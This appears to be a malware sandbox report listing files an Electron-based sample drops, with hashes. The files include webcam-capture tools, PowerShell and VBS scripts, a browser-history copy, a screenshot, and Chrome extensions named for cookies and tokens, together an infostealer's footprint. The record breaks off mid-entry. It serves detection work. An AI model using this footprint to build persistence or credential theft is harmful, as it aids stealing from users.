C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\locales\th.pak

MD5 9db3d211e01e1d7a3c8f22d5aa741f60
SHA1 2f6419deb77bc9c0436a2e038a9270e6f71064bc
SHA256 aa8c7b98610250c31a340d7e1b37eba3ed719bb8208f694b2e692f5ef8d6037d
SHA512 7462aada1d184df7e0526d2c27dc8aa3c88376367e29ed954f7d087079bc90da0929ba8344a6d4b80a4ccc5d93e2908359dd51b07a9e8e9e96a45367c4aadf79

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\locales\te.pak

MD5 297d39b371b80e0f069c0c91177f77b7
SHA1 61e29fa742a4ad69fd4d9041d79a77ad439898e0
SHA256 a45d45f2add0d8e73fc5bc1eec4eb1a5fe10efd9179d4d4e9f931c322df0fb61
SHA512 e75f631b56374c3e5658a8bbbe90251eef9fc40d189a24a7b8c9aa3442100307a99b739e4eaed546c4af9e35e6c0990d1c651c0ad7b2b4c57b29ebf84cc05167

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\locales\ta.pak

MD5 3be3fb5932fb3d55ecbbbdd30e47f550
SHA1 11fa4caa7be8de2b716be4d4177d99e762096c83
SHA256 50d38964919fa861df27fec17225d5eabda7278be34327697571340c77ca187a
SHA512 0bbe50705c5628c88f6194e5e6931f2554921003dafcdf7ae16ce5766344026da108aef4eac8b6167d3e331ea7bff1e1899d8fef14dc4ae6fefec8794f447075

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 4b25869b54ed1d538a8be5c62e92ecce
SHA1 7bfd2100c4edfaf12583183cd1278250c9970b18
SHA256 ce6f9fbfd11e5838faaf743c6b6034065ebe05763053d4495601f5608ff0410c
SHA512 4262dd0026b415525089e70d69c39ccc8724c7e319e12b61d301375bfd4919b7f0ee66ed17698270af9ef28a09c887cc44ebfc8fcfe1442808ff7b9fff5cade8

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\swiftshader\libEGL.dll

MD5 46babaf80d8f99c54e31918aa2761988
SHA1 27601d3c375713abf7b07ec7d15f92bb2d5dba32
SHA256 267c7d39b3bcc0227bfa178412278b27fa22f33f256bb77c53ca49a66d40dfc4
SHA512 0db22a3d70d2d9e2904d73e96bf918f583b56aaff87cc4fd822695330cf7592f28b9da65fe34d2ce1c0ca3c3b4a5edf924a594847e69370fb899c6ab1e24fd8e

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 dbbd090bae6142768aa8ace48f07bb31
SHA1 6d13ad281e6c3f4596ce5cb22c5984bf57e451a4
SHA256 dd85f9ab6c197564ecaa3ee0a7c38ac2facfd2a819b3b88332f9425f47871f7d
SHA512 522e5a464e5d70c059b974f4ab0609cc644ff13d0099fb2881928bea21a6101ff8ccbab2e7f7261946a95fa7bad70f6e771368d148171b814235a8bfcc1882cf

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 7f3f527fa31b61458c4cb51094e47945
SHA1 13c80bf9bba9788732ca377fec5296dbb70037ae
SHA256 185f0c093690b1ad910ce8f0c704490c7e3f680eeaae534307bf6843aed7fb61
SHA512 39f927192c1e983ce211c6c58740940be758d349fe752d8d1f241460cd1a5b0e959463b6e4772055179fee9a31a92e05cf38dda83e101a4d668e4845dd2f7b58

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\elevate.exe

MD5 817a7a3c97b3c9cbec02f33a405b6941
SHA1 c230d1e08bafdf593218baac18f92400acc048cb
SHA256 555fd65cd6b3fe5e9e9eebb182e127b94c6cde08d7f3bfd41f46d103b1bd3bcf
SHA512 df4581c8bd0fa9fcfecad18a8f55a4e7441d3e47a7745317092aa3acab427b41fabdd7356c67dd5e0ed6f9e2dbd4a35682a64d7f834c034975c59f14ce4ccbf7

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\resources\app.asar

MD5 9a3fcbebbdf1a978571d59084fa88e03
SHA1 4ae52e8bc37e3b88ee4de8157d13f8167f45d73e
SHA256 9517e642d57d3823c519e5b9708a3847eb0474ce4bd6d4245eb734df771588bf
SHA512 bc35c09265867a2eacd27e8d6764ca631041a78dc9267693ad6ec3d7a7b4a5be8fdf3bc7226fa76099d4bdd40cce0c2fee5f93587b0e8cc26308e89c292e2406

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\StdUtils.dll

MD5 4f0e2d7c70666ef8c6bf66e4cbfff449
SHA1 b713adeb6d9d1632459bf336a6c21755160dcba4
SHA256 6f4553eb07002c0f27fb725bee4fe1820fd8b26322fd00a4e01bb8f3046c65d4
SHA512 f1a62c8f686c073f665c382e29033eb32c4f4ab34b2e6039148fdb4c4f19a569f698709dc3be5c692335524bd96f00d8607a75964358a2b75f3327dfcfecedc0

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\icudtl.dat

MD5 db41bff9e595ed35df8b8704b0469780
SHA1 5b6973fd96a56c29afc8949481b7aa6d75fd5d64
SHA256 cef8f8a749f08293f4bd8f71c4760bbd160817fa3cbab12500465775ed454da9
SHA512 61515a78f2c1c9a11c83ba8310b1c8513414f5fbdb2b93751ba8c11bd9f92b13c6e0172f875d7172874473f5e649124fc9de439c55a8236678a04347a5692c22

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\v8_context_snapshot.bin

MD5 f884fdc4bd4d440089a9652e58d5125c
SHA1 74c8bb2376778330b05cb8135b83aece2dd8134f
SHA256 c5110febbb0efbd4c87663c2ce8e12d7669cd8f361f248bd74443a8c1ae0e168
SHA512 3f25b20792ef0f922d72fbd7ef80b1e1fa5d00c932291f9dcb068119aed57a638cee1eef862ed0238c518119df85400d4280862f53ec11abadc831920858dd29

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 1c9a6b55f0d1dac98e24597597d92ffc
SHA1 52f821f3ea4423cc27d2907dd7b10fb3d2dc4a57
SHA256 b83d882cce916045187b629809ac4f35071a4b20acc6fb47b9afe26cfb26bd7d
SHA512 ba248d47f96a85f56824f0220c2ff436f8ba00b37ef005e8d247f48001bade0ac859fa90a34a5ea76f03633afdad62e5bb544fca6b298c1025d9945b47c2ed12

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 8f63aa6d4ad9f0ac8c28e7b1800be599
SHA1 8a8c34de07ac607835ef00f8486a7ad31839aefd
SHA256 3636b29a17ef0f5a954342076375e4e908d732c5e81d6f69546f25ad622cff12
SHA512 36cba5319e273c891e5b224c5401147c973e47ec6c5c076ec0576377375bf8511ada46945168c8c0c9b292147523bf0562cb25257f5faf388769093eae90e781

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 3a9f63187e8b27b2a6ce006bcc69f97e
SHA1 4dbd47f5b5f293c7d594d542f8cdd9dbf6e233e6
SHA256 129bad717bfba53e4eabd746babddb2b9f7a88529603c8299c0d356ea20e4085
SHA512 cb7585436009fbded6f4695a5f8c19a5b50590e207b441b0c85380ff35468ebcacb09e56582bc251d44cabdc14c839cfada56f0bf5ecf14ef23ea409283dba48

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar

MD5 18daf4889ffd02787a6762c37f501ac5
SHA1 4ee56d4c7cbbc1a4439f3aa9f2191e74300be7d3
SHA256 c0a4e1ee4b976f108307136d161506f33e9276eaef03c04d35b8aeb9fc537f53
SHA512 e6056520efcc48a6ac51c92e2e69bfd33f47aef001b221b822d181c28767b58ec3ff2763954706f62d3c997878ba06231aa7fec0fb4022a033262fd753511a30

C:\Users\Admin\AppData\Local\Temp\ce45d07d-adb4-4e47-8cae-21975bd22b16.tmp.node

MD5 355b4f1d48fc4f353bbaf3ada57b4aae
SHA1 87c0513ea702960464f0056580e902f0ab42ee8f
SHA256 de6ba4108b8c238fc2839a7cbfe1a144ec1486e088ae4eb2717471fd8ba4f610
SHA512 0fbb9660f4c96323954023181b3b5d349dca84b866b4300a1caefaf358c37bd519e6468f3f5e583d33cc88d469168ed8aa9387bfb3cc1466f4d1da5fdc54dc98

C:\Users\Admin\AppData\Local\Temp\093d9157-8176-48f7-b9a1-03dd49d346e8.tmp.node

MD5 ee066390efb60ae8f7033ffa9d3009e4
SHA1 e5439e487d59b9e07fab945298f54347680285f7
SHA256 52c860b86a43f559e0f3571a8c01b13776bff9faf0e96c4d5ffbb8416a782613
SHA512 8fa5830528e41e37d5937a76ef64110f3a90db58ff5043507e31a3b6d74b61dae21d0e25761132d3a2867651e7b95c07b66a815980ec7c4045f2c79737a492da

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\locales\en-US.pak

MD5 d208d0a028371a8638a64514e96e5a5b
SHA1 99f57199b24a103e75b4571080e8b1b1507eaced
SHA256 9dbc79bbe1dbf8ae9d9d34c3617cda2766e742dced7b753d8dbbae17eaf8f9c7
SHA512 35092bd51273b19bba5eab04ec86aaf764379b29cbcb195f84b39b5b08aae7a6ad2929932ca2c7473d2cb682ef2329abb06a069d60897f4ced14e2fc60287c8c

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_200_percent.pak

MD5 a0e0d6b2e7887b133debbd6d36342a8e
SHA1 4e9fb7ff18f15b557c5060cbd282f873fd8a8d4c
SHA256 5c7bdc9030d81174e6ff06a522f64ddfbdefb43a79c4e10ca33c0d2d1e8d64ff
SHA512 e53ba6b3fac632e398191eef047a39f7d3694d459a7e1c54351fe87d1a30cb60871e38f8496f2d2938d70bfc692ede88af9dac7d112b3277f72230904b6a9ece

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_100_percent.pak

MD5 2c19d41021a582093bcaec88adbd7928
SHA1 0fc81e4dcd3d9a3b447372cfa99d89f9ff695b23
SHA256 be2ddb21f38e0cb6957ea90a920ca343e546170e11db6eeb3e235de28c055120
SHA512 71c7a2b41e3dcd4f4dda325d0f3e6396be8ba1ea53ad4d66a5f44890f8cde99b2a4a449f9116d24ff56b60d46201908ac5d5063e45e86c6450ead987e214920c

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 290fba4c3b284169d87aedfa8ea9ea76
SHA1 59d363d7c5c4a853a1dd9f3eb9d70592cee00cf1
SHA256 88f392de99aa1d29e11b04ad7ed80bf0cb3a2093f7e4d6fd2f3f2a7b7b2c69a1
SHA512 273be27d5004a40c7535f6ce7911784c7448717ed44ff1928f5e11bdf99bf1a7a0a20b252ce6a34b3a7ea65673fcb8ae2446a65202312e0ce05ada61d2a89c2d

memory/1176-580-0x00007FFAAB300000-0x00007FFAAB301000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libEGL.dll

MD5 a98cd214b248ec3df0d3bdc8ede608ae
SHA1 5d313bf8c08dfa5f53e9902611f9bc16d2e6a163
SHA256 dbc28c549db19b6fad32a33bcbae772d3e30d1bb5d24d9a43cf1b6cf063687f6
SHA512 4ce828e588a49c38e27e0a3b978a66195b33f4c0f7f990ad29cc80994fb51bca4e3b6235119a5cbc488cadd59565ddfec116fe469cfff92049a8d79b93c3ff65

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libegl.dll

MD5 d190c8de930443a95382ace135d1213c
SHA1 3d89fff03b1570efeec3c5a834707752828cb19b
SHA256 a36df27f11ac6a616a54b9190f05246a253dc2de06f5e97f52941d729c664403
SHA512 7e62c18daf6a306ab272110e9b77e0c147829c4855e0448cd59851c954bcad3624155ba93bb7a9bc75a9fc4dc618e259c2681d12b45d1fcc3c16c9d966582a41

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libglesv2.dll

MD5 c28b74bddb5c56bc08cee2cdfba24591
SHA1 8b073fbdb9f5552f4c4333b20e8ff4063dd1518e
SHA256 8bec94018614cb57f0856c89e5cb26d5c0fccff08c3f8c5edba95a0d98129e0f
SHA512 964d39400b1e08d87aba4a7131ec5c856817a01927910beec6e1122989099483279dda39682c2d233b86dabaf945bb8915304d32ecca0e60bf73a334faa93c69

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\d3dcompiler_47.dll

MD5 f9a85f5c42ad273c48811517de2842bc
SHA1 278ff324449228f559dd50ce553906e586eb8d23
SHA256 f96462e7a6079c9c1b635f661a8860903240b026f4c0258980e43d35eb92053b
SHA512 fc71264b8bb381aa0817b79729f6bd09c0fcd34465c6c7616b85a48d83c139f730da6a76925cadb59e98c9ad135645fa1e67563318daf063b7cbabd43b0045e3

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\D3DCompiler_47.dll

MD5 9914ee18cb910bb8274f8176a111673d
SHA1 b2ccbff315545f303619772e1d55b36decd202a2
SHA256 075f991ddb424206d486a69b747e6b613b222f3a8ff973de20030ca0623edd8c
SHA512 8f20781703ca512f8533c93d492df3cf3dfe31b81ae41cf5b588e6a86784e0d21ba2bed09266a93e45aa8483f5734e7504712d39777835cf7d8f48d4bb0a7d85

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 aa8542457941c501f7c13e7d4b69c85d
SHA1 1963b1bfeb820735a29e4176ca91e8d177792dfa
SHA256 0aa99773334e132e73350e494ae643f816d073907b0643166b04ef1467fc9be0
SHA512 e6922963e4c030ac32c934086e6c96b44cefe438413228acdca575efe89ff01128a0717a77695a6e8fb824c7702365cd4ea2e4c8638d27f5f165e0ab8be38e0f

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 32432c80716b7293d372022bbed7056a
SHA1 7a1dc84541a0ae33a3680707efb617f19761b1c8
SHA256 5d4271e417214a9c2afe72a49409796058ce740419166f7a22e3d2781f490c3d
SHA512 3e97ca25afe62e8efc5c40edc6f2eb75aa63e4ec944db4ca6f219139c2a28d315159a2109a4d13d8dd2c35474200a95cfac407d4e767070e4c65be115ede7d58

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 e1d9aef632c06a6b7141047143f65f79
SHA1 b902cc0d6197c4ebfd3eff4c9c6f71ed3de525c1
SHA256 293097ac8ba031839dadf760c00cb5b48c8c9a890b98f5c0700f2be9be84a5cd
SHA512 4b1cc38e675fe148c9305070b8aedf08bed6c3191ad4987d8c089764cb0d7206b613f64f7837bd08bd309d0c0148bc3374455926ecfeb624e6952b91bd263b9c

memory/4612-611-0x0000019726560000-0x0000019726582000-memory.dmp

memory/4612-612-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/4612-615-0x0000019726630000-0x0000019726640000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/4612-619-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/3000-631-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/3000-634-0x0000023236C20000-0x0000023236C30000-memory.dmp

memory/3000-633-0x0000023236C20000-0x0000023236C30000-memory.dmp

memory/3000-637-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/3000-632-0x0000023236C20000-0x0000023236C30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/4612-614-0x0000019726630000-0x0000019726640000-memory.dmp

memory/4612-613-0x0000019726630000-0x0000019726640000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ay5gjiwv.4ct.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/1188-652-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/1188-653-0x0000012E74C10000-0x0000012E74C20000-memory.dmp

memory/1188-658-0x00007FFA88560000-0x00007FFA89022000-memory.dmp

memory/248-670-0x00000275F0860000-0x00000275F0870000-memory.dmp

memory/248-676-0x00000275F0860000-0x00000275F0870000-memory.dmp

memory/248-674-0x00000275F0860000-0x00000275F0870000-memory.dmp

memory/248-664-0x00007FFA88610000-0x00007FFA890D2000-memory.dmp

memory/248-686-0x00000275F0860000-0x00000275F0870000-memory.dmp

memory/248-690-0x00007FFA88610000-0x00007FFA890D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

MD5 609fc2b5372c19a3ba1803dbf633f65c
SHA1 af70271cbc47b08582841209fd230cecdebf108d
SHA256 d98234979aa9624a27181ac4e263599dc86f7c2d6697e5c8fff9191ceb5347a1
SHA512 f09871f5a6fe4a404f0dcd4f4e459b7704f1c64f144d646948c00d9e25028308745ddd9e45f725e1efa07d6dadca13e8256e550bd67620c5c5bbedde6707764f

memory/1188-655-0x0000012E74C10000-0x0000012E74C20000-memory.dmp

memory/1188-654-0x0000012E74C10000-0x0000012E74C20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6c485d7dad66023cf59f0839afb43f6f
SHA1 a4fc06a1001056ccf44272b67f3d71f3d37fd264
SHA256 5003f6ea0d078001d131acb3bd63cd58d158b4c7651a43dab88327a124d5b378
SHA512 8bc3098ef176b78661f8235b30ebe91af8a54eaa74412f0e849ece21d0cac253f01197b0f9cff368fc2f53b4c21b450376c40fe8fb3649ca8afd7daa44139d67

memory/7156-830-0x000001E0B9C80000-0x000001E0B9C90000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c99a7cb0e5665ab099358498d126f1c6
SHA1 d24294128e3c665dee7433844693168288568393
SHA256 61ce147727ee82572031bf35fa007e0dbc180686d0c74d734c82540133e24d3e
SHA512 6a4674ad7245f585fe4e5dd5672c169d5949995b7a51c05284afdd12ebb3f69c9c4cb894d4008cd7e01a4316a60ec829dad75ee16c2888961294e9921dc95687

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7841f19c69a2be5bf24c2f48d857eeba
SHA1 bef6688d448321c861919766b66a6796e2c11f35
SHA256 8ab73e40f00ac5ffefbd5c3b37088d8ef9b7926f9ae2d78b28820ddd9405a2cb
SHA512 c704206645648f1f07502617f008bc1efab18d95e0d62545164a8a75321292a9b7e2175cafa115d025e13263663b0a112cd8f381fe2a541c2167f7171849793f

C:\Users\Admin\AppData\Local\Temp\O1Ji08xhJqly_temp.ps1

MD5 cc765c3e5c1fcd7d182fbf7884dd1a5a
SHA1 bea2bddd9377035fbf6c8b7762fc0dfaa5c341cd
SHA256 6c9ba81b609dc2fcc8b5b62b7168523deeb4f6bb6f46830f163f9ca9e49d3c8c
SHA512 e0ed73a0327955055205e4614447740625b754ec6ff05d7c63adf13deedbeec23e303b26c42f1a4e8afcd1beb44924d93664c18079e53e0dcbaba064d557fb57

memory/6096-882-0x00000247F8270000-0x00000247F8280000-memory.dmp

memory/9328-883-0x0000019EA2A10000-0x0000019EA2A20000-memory.dmp

memory/6096-888-0x00000247F8270000-0x00000247F8280000-memory.dmp

memory/9328-887-0x0000019EA2A10000-0x0000019EA2A20000-memory.dmp

memory/6780-890-0x000001FDA38D0000-0x000001FDA38E0000-memory.dmp

memory/6780-889-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6844-892-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/9328-876-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6844-901-0x000001D383BA0000-0x000001D383BB0000-memory.dmp

memory/6780-911-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aadaa9c3e051e8d953cc06a565bbcc07
SHA1 7f0cf8c2b97f64f47927a1acb46044b862824e7c
SHA256 ff793d25a7fbf3d256023097845d128c896f1a9629d3085497514a88cdda47d8
SHA512 d5ed471aaa7d31f15f5b3a58381b7841eeb4d85e6570914ebc7798e757ee1f2cdcb99e1e1a070659fd40bfdb70007a51f22a50335fba04a7e1851d622b9098aa

memory/8896-919-0x00000181E19E0000-0x00000181E19F0000-memory.dmp

memory/8896-918-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/8896-929-0x00000181E19E0000-0x00000181E19F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xy5ssfbw.default-release\places.sqlite_tmp

MD5 d4ddd98852c1891f2f3bd625979a061b
SHA1 6f513a53acc71c7c4d8f2ed33dc25070bb069574
SHA256 92d7d54f69583655b4935e7c63d528f4e203b9b705d7ecc1237bf104c11afd65
SHA512 fdaff923951b1a1413ceaef9036fedb2a1da8fe0e97ee6ca52f3b2f3604468de07e4a54636e0a7a16b48301bf4f1f798891e362968d69645d93e25498ed5e128

C:\Users\Admin\AppData\Local\Temp\FlpVJ7DXY7JF22hXICRN\System\ADFTSOGA - 2023-12-20_084906.png

MD5 1e32e95b2f2279bf536154a4ba4f9962
SHA1 3491d4aaed59c7c5ec1da802bbe7e1d1f09e34d3
SHA256 5f61e32efe37d5e49f8f0be9d83cc9d6da1f7d696369cb881f519913c8723e30
SHA512 7ff3cd3a46287d96b1fbc7fbe7ca1df0141d509777a92d05c5f286096155a19c7d6c931eb48fed6d5d792ebf557e923fb2b56745e268013b287e131bdbad5f14

memory/8896-935-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b5655b797c26ffc04f79597d8d56eba
SHA1 8b6d6e58ab350bf1c526ed324e523f4f0cf808f0
SHA256 5893e9041f26e97ce9864f245da1211ae2570503facf24a5bb21ee7b858c9548
SHA512 89549717ce4b618fc68df01066d0cc1d3198a94e616fa84e563e5cbcd2f9aae4dff4599d5b8e013ab5e8da798c669dd41751d25f988f729bf8bc8ed0fd9645ae

memory/9328-932-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6096-917-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6844-913-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

memory/7156-912-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ba7ecbbdc1af2495ba9632854d63eba
SHA1 403e1c4f6b9acec06e407b784020ee19bdd800c6
SHA256 0e0ef4a7e7f29527dfd9769ebddbdfabfd776a9249ac39d37f53a6836df24f5f
SHA512 ac05e26ea203f220eff0dd4dc22bdacd0ac20274cafaac22f0bd3150cac92c09c40659e6f1ceac2735aef1e57a4a7abfadad224e3c47fe3533939b001861725f

memory/5316-904-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6096-858-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/5316-845-0x000002257B1F0000-0x000002257B200000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0a4168419c14b789048626ffc8b36f3e
SHA1 8953652c22a8c7e310277bcf3e98e09ed577017e
SHA256 b6e4354d8edab23a8e069441d729a595da834eb3fbe18c08ba975fe826063f88
SHA512 3ed529e2e9a28d276953d3ba23363d8141887542fdb79e94bd00ba0f0b867300617765783e162a531a3c02f8dc8dbe22328c0fc7bfea088f1ba09c801a52572e

memory/7156-826-0x000001E0B9C80000-0x000001E0B9C90000-memory.dmp

memory/7156-825-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/5316-819-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

memory/6188-1003-0x000001CDA3A90000-0x000001CDA3AA0000-memory.dmp

memory/6188-1006-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs

MD5 78177529859c4b1e80099638385703cd
SHA1 b704e30eff2870311f962eaab4c50b778657e762
SHA256 f160093605e9dfceaf8df71380bd5c727fca7930333448c038521c000a4511b9
SHA512 927ac990212346b08e76ca2f82ded5e8d46ad26c59ac323cc274ab9f663be78e43d10bb7a741350436aaf447b736d8cfe8e54bfb7075a3ce4d0cc5b94f429522

memory/6188-1002-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb6332ae9e8fec69c2236355e2638f9d
SHA1 71500d57fb304979afd6756f06d4b9a59f995eb7
SHA256 88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32
SHA512 e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed

C:\Users\Admin\AppData\Roaming\salutqgayo.ps1

MD5 4fdddf586aed433adb0bfe7362592055
SHA1 a0e31dcb709ccd9e7078529880c66611d7f418ea
SHA256 4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0
SHA512 99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362

memory/9356-1049-0x00007FFA88680000-0x00007FFA89142000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
